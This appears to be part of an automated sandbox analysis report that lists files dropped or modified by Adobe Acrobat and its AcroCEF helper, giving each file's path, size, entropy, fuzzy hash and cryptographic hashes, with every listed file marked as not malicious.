Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.249605883144657 |
Encrypted: | false |
SSDEEP: | 6:iO4/Io1q2PqLTwi2nKuAl9OmbnIFUtS/J9Zmws/JPkwOqLTwi2nKuAl9OmbjLJ:78Io1v8wZHAahFUtOJ9/wJP5TwZHAaSJ |
MD5: | D492A6C8309F341062101EEEAFF281F2 |
SHA1: | F2058D561C6A42A72087CDCC2C0B30DE8E7A81A3 |
SHA-256: | 9168C7B8370C597D7C1018B688C2124A19D36388244A7224CB97160186EE7BF1 |
SHA-512: | 6917A46F04EC5B979FAE0C0CDBF29A64CFA90A976B1F6C5DD3267878033E2977FD01D636CE18A267E84B66D5C6923AF32B80007FBB16E2998BC66B183E6BB426 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.249605883144657 |
Encrypted: | false |
SSDEEP: | 6:iO4/Io1q2PqLTwi2nKuAl9OmbnIFUtS/J9Zmws/JPkwOqLTwi2nKuAl9OmbjLJ:78Io1v8wZHAahFUtOJ9/wJP5TwZHAaSJ |
MD5: | D492A6C8309F341062101EEEAFF281F2 |
SHA1: | F2058D561C6A42A72087CDCC2C0B30DE8E7A81A3 |
SHA-256: | 9168C7B8370C597D7C1018B688C2124A19D36388244A7224CB97160186EE7BF1 |
SHA-512: | 6917A46F04EC5B979FAE0C0CDBF29A64CFA90A976B1F6C5DD3267878033E2977FD01D636CE18A267E84B66D5C6923AF32B80007FBB16E2998BC66B183E6BB426 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.211873253215634 |
Encrypted: | false |
SSDEEP: | 6:iO4/O+q2PqLTwi2nKuAl9Ombzo2jMGIFUtS/J9Zmws/mBVkwOqLTwi2nKuAl9OmT:78/v8wZHAa8uFUtOj/wmP5TwZHAa8RJ |
MD5: | 08376A817358DE30F746625A3FBC2305 |
SHA1: | 521AF0F372BFC9683E4A92A9FD6D265F101F421B |
SHA-256: | 4B902E5039C5AC45DC9A3B2D4C6A59A238BB8B5209630AC957BAF7DAA5A84A00 |
SHA-512: | 4F331A82E6E8357F82E5E6DBE8BCB21DE48AF1574F0AA1CE9C7901158113622AB90659504C7B4F44C7D01F34B41348C086D34B096C10C27FD9D74E51BDDC7A83 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.211873253215634 |
Encrypted: | false |
SSDEEP: | 6:iO4/O+q2PqLTwi2nKuAl9Ombzo2jMGIFUtS/J9Zmws/mBVkwOqLTwi2nKuAl9OmT:78/v8wZHAa8uFUtOj/wmP5TwZHAa8RJ |
MD5: | 08376A817358DE30F746625A3FBC2305 |
SHA1: | 521AF0F372BFC9683E4A92A9FD6D265F101F421B |
SHA-256: | 4B902E5039C5AC45DC9A3B2D4C6A59A238BB8B5209630AC957BAF7DAA5A84A00 |
SHA-512: | 4F331A82E6E8357F82E5E6DBE8BCB21DE48AF1574F0AA1CE9C7901158113622AB90659504C7B4F44C7D01F34B41348C086D34B096C10C27FD9D74E51BDDC7A83 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.968225667413608 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqsYhsBdOg2HFcaq3QYiub5P7E4T3y:Y2sRdsmydMHk3QYhbt7nby |
MD5: | AB54C530195B8145CAF55377EE26B9F3 |
SHA1: | 7EA998B965D55F6066CC5D5907882B5CEBA9AE6C |
SHA-256: | 9AEF83DFD8E99D641F69D0E4D764B459952285EBE966F774850344BA65944C60 |
SHA-512: | 3C18BED5BA1319D441B7342A1C498EC7AB3C27F04B99EC7C00089F5F48CA9163B6E22CEC73F7B606D3AA13548305E1549B47E29F1BA607A57B3E91EC5FF557FF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f77ddbb0-b3c5-4d23-a50f-41ab1c64e8a7.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.968225667413608 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqsYhsBdOg2HFcaq3QYiub5P7E4T3y:Y2sRdsmydMHk3QYhbt7nby |
MD5: | AB54C530195B8145CAF55377EE26B9F3 |
SHA1: | 7EA998B965D55F6066CC5D5907882B5CEBA9AE6C |
SHA-256: | 9AEF83DFD8E99D641F69D0E4D764B459952285EBE966F774850344BA65944C60 |
SHA-512: | 3C18BED5BA1319D441B7342A1C498EC7AB3C27F04B99EC7C00089F5F48CA9163B6E22CEC73F7B606D3AA13548305E1549B47E29F1BA607A57B3E91EC5FF557FF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.226936576698723 |
Encrypted: | false |
SSDEEP: | 96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068Ozjz0BbIm:1CDLCmPj8j0/8qKgwPHYPx8xemT8Ozjg |
MD5: | 05EACB44189F702AE8043DA763AFB2A3 |
SHA1: | 18EAC0E38408E4EE3A295F13D4A19DC9EBDF9B6D |
SHA-256: | DDEF5A42DF219F9CBCC3DB0C4C8F5D59A37D3D6277351C7E62BD505B63319943 |
SHA-512: | 00A92620807491DB8F0E971535873228AAAA84D1EB67D9A292646B3FD78C982EFA6F557DFA05B2C586DB51F51141A001E619C96C704D44210861050EECAB780C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.222111912772623 |
Encrypted: | false |
SSDEEP: | 6:iO4/jN+q2PqLTwi2nKuAl9OmbzNMxIFUtS/nAZmws/1jNVkwOqLTwi2nKuAl9Omk:78jIv8wZHAa8jFUtOnA/w1jz5TwZHAab |
MD5: | 90679EF98629825088C639F30478DBE1 |
SHA1: | 58A421960DCBFE4EC64D494788BBE3C1DAF88056 |
SHA-256: | 89DB35EC7C140A424F2E13CD06D74D1888C66E77DC79419B061FDD74DA902B29 |
SHA-512: | 2A1CB036DAEAA4FB9C9F954F005E7AE42AE0A0BC1ED5C71FCE1FF9DED4EFE6A8DAA7C8B9EA14468179F73BDEE0C8438C83F0BEF34365244FDD94A249AE839E5E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.222111912772623 |
Encrypted: | false |
SSDEEP: | 6:iO4/jN+q2PqLTwi2nKuAl9OmbzNMxIFUtS/nAZmws/1jNVkwOqLTwi2nKuAl9Omk:78jIv8wZHAa8jFUtOnA/w1jz5TwZHAab |
MD5: | 90679EF98629825088C639F30478DBE1 |
SHA1: | 58A421960DCBFE4EC64D494788BBE3C1DAF88056 |
SHA-256: | 89DB35EC7C140A424F2E13CD06D74D1888C66E77DC79419B061FDD74DA902B29 |
SHA-512: | 2A1CB036DAEAA4FB9C9F954F005E7AE42AE0A0BC1ED5C71FCE1FF9DED4EFE6A8DAA7C8B9EA14468179F73BDEE0C8438C83F0BEF34365244FDD94A249AE839E5E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438569300084701 |
Encrypted: | false |
SSDEEP: | 384:ieEci5G9iBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:rRurVgazUpUTTGt |
MD5: | 4AD04272A9B1C69C812A0BF034E5DC4E |
SHA1: | 1187195392811D98904DD7B281732C0538833CF8 |
SHA-256: | 1BB86FF600791C9D8816B2CFB16C972FC1B8CA13F3BE44557181CA55F46C1448 |
SHA-512: | 9F271EB573A566C1FD80202B6F5C973E1B57D61ED618C01C2C09F44AAF8EF7D0EBFFAE3E3816AFD698414E212CDBBCFB4610FF355037F33B631DA02AB5ADF30E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.216281928547962 |
Encrypted: | false |
SSDEEP: | 24:7+ttT36wK6nqL0MzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmfG:7Mt7W6nq/mFTIF3XmHjBoGGR+jMz+LhO |
MD5: | 74C2BE53A6703204C559A2DAB055B4FE |
SHA1: | 2E9A85AA7852693204DF20C3A3B4523B817CB309 |
SHA-256: | 46CDE1F1CD135006C714E280BAE1FE512F9D1454350A39B893344C74E4F1B92E |
SHA-512: | 7C1E6CB72546BE34D4AA8E796D29FFC86E8BBDFA5A11AA6D8264517947F7650AB39F6AE9283D4190BA888C73A5E2BE2FF92E12A11349966C5E02F309B9A653D2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFklQKVGRltfllXlE/HT8kjZNNX8RolJuRdxLlGB9lQRYwpDdt:kKJGyeT8a3NMa8RdWBwRd |
MD5: | D49156E7294FFF1DF32850615B524472 |
SHA1: | EDA9074E2347051DB3E399097386B8CFB7AF4C8C |
SHA-256: | BE7B8B15C76EC4EFD7B631FB230D75F7972E4E178D911D7AAEF88B3BD4D63349 |
SHA-512: | 2DB1AC61D249264410993E5960EF43FBC9C856306461D2C9092011506E20420FEC902E77DBD437FCED985866AE2BCA2E9363CB9C1548019C79DC8874EC34CC61 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.218904650777295 |
Encrypted: | false |
SSDEEP: | 6:kKZjL/L9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:N/iDImsLNkPlE99SNxAhUe/3 |
MD5: | 9135670011A4E1243C264D7BAC3F4507 |
SHA1: | 9EA7383E9738FA0ACE9D9B8AA94ED2701BD87408 |
SHA-256: | 4D4FCBB18B2450D00EB795EDCC574FBC985DBE8E44330921796AF10FFE285879 |
SHA-512: | 999D6CAE3E223E9441988E40EE80FFB244334EA25C274546AD07405496A9545DD4D0931B4EB2CD21C4E747218D0A96F7CE8EDE11DE674B9180A2BC74C9526352 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.364489174883821 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJM3g98kUwPeUkwRe9:YvXKXkqpT5LjIP0GMbLUkee9 |
MD5: | 6718F7C85BEC7906DBAE757D6439F20D |
SHA1: | E6E5FA6B9DCFB7FC745D2696AC936569DF869400 |
SHA-256: | 46482BEE03E7A09A030874E16DC4943DEA3CBE531254F9F08F6C8BFE3150064A |
SHA-512: | 9E57C7E649AD5A7A1F26E54D06C2AB38BF47B39EABF74D1DAA225799D3D127147EAA138F39BD2851E6AF27A9CE055EFACCAA37F77DEBEC815BD34DDB1440164F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.314389665376957 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJfBoTfXpnrPeUkwRe9:YvXKXkqpT5LjIP0GWTfXcUkee9 |
MD5: | 9102DAD00E143BBE8013EDA3F4BEFE45 |
SHA1: | 8EE58D540923C2ABAA2160C56F7DCCE82AD85549 |
SHA-256: | 65251DE8C68498A02A21EA4F1C2B1CFC1AA27B7174BEA6BBE0F0D8FDD5859844 |
SHA-512: | 28E2A035B73DCF91C2FF4D49490C938CBE05CA39DFE21A1E89BED8D7024AB31F4ED5BC27E9B075F0D27D2A7624AD03A0753142F52548A15A23B92591A6B7FAE6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.2932107404225555 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJfBD2G6UpnrPeUkwRe9:YvXKXkqpT5LjIP0GR22cUkee9 |
MD5: | D145756A7154E4570C171B110210BC8A |
SHA1: | F87B3A3737B193D6D758D190E8744249298CAB98 |
SHA-256: | 1042F314B215E508899B89C1456FBCB2BFA9C220C53E3EA9A4A1023C5C0724BB |
SHA-512: | 2602AB7E373C347331D4169E2B0D05E9AF8A3DCF08130A0D21D0FE654EE49B971CFFCFDFC333A04D288FDA36938129B2FF57B240D4D8C502C50BE8FE2347517E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.345530708795778 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJfPmwrPeUkwRe9:YvXKXkqpT5LjIP0GH56Ukee9 |
MD5: | 36ADB66F86CC099F831DD4A615E73E26 |
SHA1: | 79605CF44A763D94FE18834A9FC07C2E9B7516A1 |
SHA-256: | B1A39D9766D4E696B231E0BD5F4015941B11C2FD871E51CD4274392BD13F127A |
SHA-512: | 406B30EBD6EDCB1920A7D985C2C2A4F0CC0CD692E8F2944CCB27E6D0FAAF090A4E4FF9CEF1E72F3AE0295C0F7CCAFDD40470783D2EC139397128195C6B414711 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.694239117097009 |
Encrypted: | false |
SSDEEP: | 24:Yv6XkqpT5XIppLgE9cQx8LennAvzBvkn0RCmK8czOCCSM2:YvuXUhgy6SAFv5Ah8cv/M2 |
MD5: | 772F456DBC7887EC2CBDEFED31EFFB0F |
SHA1: | 4A457AA3DBC797C4B841076E8C8DCD5DC7599256 |
SHA-256: | 21507DDA979F5C077382DE9476B69BB72C89BDA914774FADE068D53AD0D23000 |
SHA-512: | 64A1BC41106AD0F438B2C496B0DE17787CBAF008C03893405B59B9AD226EEF42041FD5E7962E1C726B7E86DBBE8402709FC71E140D1AE48B0487E174B1563466 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.316106476119952 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJf8dPeUkwRe9:YvXKXkqpT5LjIP0GU8Ukee9 |
MD5: | BAAFB5AABFEFC919C5144BB4CEE50A17 |
SHA1: | 0636932B90928B375EC71E69BACC4552F5D997E0 |
SHA-256: | 5C4644343082583DF7B00FED9D5480B6813B4F5BA6D83B9830932904AD5CFB1B |
SHA-512: | 7EA19BC7337BC1301A728807524C43A9B542F6F12E50E371C2C9622F16ED4521FE0E0F8B04341439320F7CEE096181407B39597C43C3EC957460BAD7AA5083C5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.306896227693121 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJfQ1rPeUkwRe9:YvXKXkqpT5LjIP0GY16Ukee9 |
MD5: | C145B1DE724E7C73793D605F62F98001 |
SHA1: | D63B4256B86AA90FBE680B5D6AACBAAE6A096908 |
SHA-256: | 4BAD3787930C6C9A802BCC6CD5031E957CE4694CE5C86E00E5B49F1CA9F9026A |
SHA-512: | F0CD48D391CA32720D41226B1749156F6A2AC18AD6E06459FD51DADBACE9FAF3FE6037CC1930ACAB820764D39D63F901C6918F86E1BD9BEF52DC9A7D81254B74 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.324338918210965 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJfFldPeUkwRe9:YvXKXkqpT5LjIP0Gz8Ukee9 |
MD5: | 36865EB77FEC1D2D0AB86C37DD68C800 |
SHA1: | 3A42F4C7B87A208EDEAAE274E157B10345B75341 |
SHA-256: | 41E2666AACA4A3D618DADC034FF770E6354FABC38B6220B891D66C7EA1921892 |
SHA-512: | 70EB924E4EECE4D1824FF0737D00256DDB24FBD14F0A16E1421F0B38FB3558CEC1BE0A1C683495431FC29B319BA166388C0B2FA39B81CA2FDB1FB574FFC2B589 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.341926950241369 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJfzdPeUkwRe9:YvXKXkqpT5LjIP0Gb8Ukee9 |
MD5: | A21DEC54D0BAF1184F77A224B934EB83 |
SHA1: | 8B14CC369DC0CC0B1E7ECC993D3DB41167303E69 |
SHA-256: | 5919EABADA8D1AFDAFC78EAEA4880C4D48606DD32BC20F5322F246B93D8409A2 |
SHA-512: | D1ACB6D9F2874B2E197F4A8EBCDF89F7FF04B7C8450DD7F4295E32340D67D212D339EF95C0F2A08FFC67F71E4C4F734E35077585BF876EA25C72BC7D64556534 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.322745317764145 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJfYdPeUkwRe9:YvXKXkqpT5LjIP0Gg8Ukee9 |
MD5: | FD307D46FC16F1914E89C246B63A67D5 |
SHA1: | B142A2BBC184FE25F48AEC65AAD9D21F12F4658C |
SHA-256: | A6E14688E752C8B356B8694543A8F28DC8EC8478FCDDC7FC90A71ADDAC476A1C |
SHA-512: | ECB7E9738712D985F2111878CEC6CD96712F6C8BA4A2D48DDB124BA037E7B2EC3850C5573DF38E7598775BC3DB0535F9C67FBCCD8D7805004B84329BFBA4B736 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.309777489942763 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJMTHvqZbcuWmSg1c2LjcWkHvR0Y3oAvJf+dPeUkwRe9:YvXKXkqpT5LjIP0G28Ukee9 |
MD5: | CED2537AF07B9EDA499A6A194954926D |
SHA1: | D54D4CA1C66C947CDD3970796E3C7F242704CD54 |
SHA-256: | BFE3383DFAF1F0A4ADDEA0DB314CCF7308BC3B03D2209044B85545EA4E9056F7 |
SHA-512: | DB3107EB89EA845B6FE429BF935F5CAE0FA7DAEBF332F9400D1DC5AEB777E9171D51161DCB3EF4654D2C928C0D796268056CB240001042097715701516ED7279 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.306136090230008 |
Encrypted: | false |
